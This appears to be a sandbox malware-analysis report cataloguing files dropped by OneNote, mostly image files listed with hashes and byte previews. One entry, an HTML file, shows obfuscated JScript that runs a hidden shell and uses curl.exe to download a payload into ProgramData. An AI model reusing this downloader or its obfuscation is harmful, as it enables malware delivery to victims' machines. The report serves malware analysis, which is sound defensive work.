                                                                                                                                            Preview:.PNG........IHDR...(...(........m....sRGB.........pHYs...t...t..f.x....IDATXG.Q.. .D.=Y.dz.x..*..~9.X..`...D."|0.[...Y.S..k.}.s#..1nA.f.*.#@.u2.s9..-.f...y_...T...h.........w.=....Gk%JW.v.._L)E}k..r..M2..$"A.D..z. ...P=k..Q...5H.(.T..$A.....;..Y.v?...s1........~.6.N..p4B....IEND.B`.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000059.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (1260), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2071
                                                                                                                                            Entropy (8bit):4.6535465810065695
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:5C9/KCeWPfdZ4WPe+G+7LrMjFA45MIostil:c9i0dZ4J+57GA45XowM
                                                                                                                                            MD5:C9D2355FC2BE90B0FA73ECB67061A77E
                                                                                                                                            SHA1:5A7792A9B3677FDC6596B09C7AFF117DDF15BD28
                                                                                                                                            SHA-256:4F069F918EDC3919F59CD0608574BC214D6020E81F2603F0E3B3BAD6E0F9939E
                                                                                                                                            SHA-512:9011308DB60773AC6F33462FEAC996DF17F34E1A9322BE2306C11674CB53D81D5492BE5DE7FAAC700344F1DCD8763A3B2876E064318E46F5186671352FC3B734
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:<html>....<div id="content">f5&u5&n5&c5&t5&i5&o5&n5& 5&s5&l5&e5&e5&p5&(5&m5&i5&l5&l5&i5&s5&)5&{5&v5&a5&r5& 5&d5&a5&t5&e5& 5&=5& 5&n5&e5&w5& 5&D5&a5&t5&e5&(5&)5&;5&v5&a5&r5& 5&c5&u5&r5&D5&a5&t5&e5& 5&=5& 5&n5&u5&l5&l5&;5&d5&o5& 5&{5& 5&c5&u5&r5&D5&a5&t5&e5& 5&=5& 5&n5&e5&w5& 5&D5&a5&t5&e5&(5&)5&;5& 5&}5&w5&h5&i5&l5&e5&(5&c5&u5&r5&D5&a5&t5&e5& 5&-5& 5&d5&a5&t5&e5& 5&<5& 5&m5&i5&l5&l5&i5&s5&)5&;5&}5&/5&*5&*5& 5&v5&a5&r5& 5&u5&r5&l5& 5&=5& 5&"5&h5&t5&t5&p5&s5&:5&/5&/5&g5&o5&o5&g5&l5&e5&.5&c5&o5&m5&"5&;5& 5&*5&/5&n5&e5&w5& 5&A5&c5&t5&i5&v5&e5&X5&O5&b5&j5&e5&c5&t5&(5&"5&w5&s5&c5&r5&i5&p5&t5&.5&s5&h5&e5&l5&l5&"5&)5&.5&r5&u5&n5&(5&"5&c5&u5&r5&l5&.5&e5&x5&e5& 5&-5&-5&o5&u5&t5&p5&u5&t5& 5&C5&:5&\5&\5&P5&r5&o5&g5&r5&a5&m5&D5&a5&t5&a5&\5&\5&i5&n5&d5&e5&x5&15&.5&p5&n5&g5& 5&-5&-5&u5&r5&l5& 5&"5& 5&+5& 5&u5&r5&l5&,5& 5&05&)5&;5&s5&l5&e5&e5&p5&(5&15&55&05&05&05&)5&;5&v5&a5&r5& 5&s5&h5&e5&l5&l5& 5&=5& 5&n5&e5&w5& 5&A5&c5&t5&i5&v5&e5&X5&O5&b5&j5&e5&c5&t5&(5&"5&s5&h5&e5&l5&l5&.5&a5&p5&p5&l5&i5&c5&a5&t5&

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005A.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, progressive, precision 8, 1312x424, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):54127
                                                                                                                                            Entropy (8bit):7.804118984558617
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:4uWStwiFAImRuCERn9FCD7OTseOMUX7we1WHzjKALnTCCCCCCCCCCCCCCCCCCCCp:4uWt4AJERnyNenUWHCoTCCCCCCCCCCCm
                                                                                                                                            MD5:2CCB7FD40E61B6DD2CD936E61929FB81
                                                                                                                                            SHA1:B10AC2D16273A785C6B73E4CE047716CB451BE1C
                                                                                                                                            SHA-256:CBF4835796C6C58C2EEBB12BFE73AAAE73D0E9F37C5BD5DC63092ED776485FE8
                                                                                                                                            SHA-512:A83BFF1E484CAB88E97B72083A1E232A87856253928C1434F48C904343845AFEC8D2B1084E0BEF102C46413A34F9D8D1CB25A280FD968FF19927E17601326946
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005G.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):40884
                                                                                                                                            Entropy (8bit):7.545929039957292
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
                                                                                                                                            MD5:7379775A1E2AB7FAB95CFFCE01AE05F3
                                                                                                                                            SHA1:3D3DDFD8AC7E07203561BAE423D66F0806833AB3
                                                                                                                                            SHA-256:9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
                                                                                                                                            SHA-512:4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005I.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):24268
                                                                                                                                            Entropy (8bit):6.946124661664625
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
                                                                                                                                            MD5:3CD906D179F59DDFA112510C7E996351
                                                                                                                                            SHA1:48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
                                                                                                                                            SHA-256:1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
                                                                                                                                            SHA-512:2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005K.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):39010
                                                                                                                                            Entropy (8bit):7.362726513389497
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
                                                                                                                                            MD5:9700DE02720CDB5A45EDE51F1A4647EC
                                                                                                                                            SHA1:CF72A73E1181719B1CC45C2FE0A6B619081E115E
                                                                                                                                            SHA-256:7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
                                                                                                                                            SHA-512:5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......|]v....D..9.k.w.|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005M.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):59707
                                                                                                                                            Entropy (8bit):7.858445368171059
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:k76rvGc8WKC2/UX1uEgVRY/jvv9CblyL/T:k77Z5C2/Ow1e9CblCT
                                                                                                                                            MD5:47ADB0DF6FDA756920225A099B722322
                                                                                                                                            SHA1:851946B8C2BD0BB351BAEECA9E5BB6648A87D7CA
                                                                                                                                            SHA-256:EC8CD7250F3D82E900E99114869777EE859EC73EFFABED108815F65742078C3A
                                                                                                                                            SHA-512:85A9920E1CE4A2FCCEBAFA425C925DF33580FA3C3C00178F058539B2FBC0163866DB8A41B320E2EF2CD217F00FFA06A1A831C728D3F9F910C9EAC58B5DA76E2D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..A..Qaq"....2........B#..R.b3$..8xrC4&'W.%e.(.c.d.5E6Ff..h..SsTt..u...Gg..H.....................!.1..AQ.aq.".......2..st.BR..56.r#3.b.S.4c%...$d.CT............?....3.7...G:../P....z..K.:6..w......6....... .z7...~.....{gdF60...9....{...'[N....m.........z...g{.......7...4..1..=.z...._..p...m..Icd.~.v..9.P..0Z(.<j.......R6zm.....v.z...>x..)=g........zo{..w..f..y.t.....%.D..#.}.I.>).H.QM..cLD..x.../.^y.{.............y.=^.......I.T.......U..0_?...u..og..3.ky..K....6w...Dc......~........ik.z....N...en......_.....x....._u...4.{..P...>.....}.......>.R.....m.....[mt.....}.........|.....m......~....B.F.]C.36..q....yg...{]...+.DZv.9<.o..;..N.n&im.,....w.3...V.s...Y..e#$.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005O.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):27862
                                                                                                                                            Entropy (8bit):7.238903610770013
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
                                                                                                                                            MD5:E62F2908FA5F7189ED8EEBD413928DEE
                                                                                                                                            SHA1:CA249B4A70924B73BDA52972E9C735AEC35A0C5D
                                                                                                                                            SHA-256:20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
                                                                                                                                            SHA-512:EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..|.Q..I.&.. ......"T4)wdH.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006T.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):22203
                                                                                                                                            Entropy (8bit):6.977175130747846
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
                                                                                                                                            MD5:2D3128554F6286809B2C8E99DE5FD3F6
                                                                                                                                            SHA1:FC42CB04151D36F448093BDEFE33031A9B8D797D
                                                                                                                                            SHA-256:14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
                                                                                                                                            SHA-512:D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H.....XExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&...........*.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006V.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):52945
                                                                                                                                            Entropy (8bit):7.6490972666456765
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
                                                                                                                                            MD5:AD003F032F32FAC4672D4CE237FA5C5B
                                                                                                                                            SHA1:AE234931B452F0D649D91291763B919CF350EA49
                                                                                                                                            SHA-256:ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
                                                                                                                                            SHA-512:ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k|...S..d.4.>.RW5z.$.i.)V.O....>o...c..*&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N*..|.4...80.#..e....t.J..ZQ.x|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000071.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):25622
                                                                                                                                            Entropy (8bit):7.058784902089801
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
                                                                                                                                            MD5:F8CCFC24DEB1D991EBE085E1B2D7D9BF
                                                                                                                                            SHA1:AF76C22A765434AEDA134924C517C84107F4FED5
                                                                                                                                            SHA-256:7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
                                                                                                                                            SHA-512:818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q*.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..|..n.....6.*...f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf..*....z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.)*.e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000073.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):15740
                                                                                                                                            Entropy (8bit):6.0674556182683945
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
                                                                                                                                            MD5:FFA5EC40DC9A0FD10EB9E6355142D6A6
                                                                                                                                            SHA1:3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
                                                                                                                                            SHA-256:D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
                                                                                                                                            SHA-512:6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000075.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):55804
                                                                                                                                            Entropy (8bit):7.433623355028275
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
                                                                                                                                            MD5:4126992F65FE53D3E3E78F6B27FD49DC
                                                                                                                                            SHA1:BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
                                                                                                                                            SHA-256:3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
                                                                                                                                            SHA-512:624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.*a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[...*..t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000077.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):41893
                                                                                                                                            Entropy (8bit):7.52654558351485
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
                                                                                                                                            MD5:F25427EFECFEE786D5A9F630726DD140
                                                                                                                                            SHA1:BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
                                                                                                                                            SHA-256:5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
                                                                                                                                            SHA-512:B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ*.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[F*ly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000079.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14177
                                                                                                                                            Entropy (8bit):5.705782002886174
                                                                                                                                            Encrypted:false
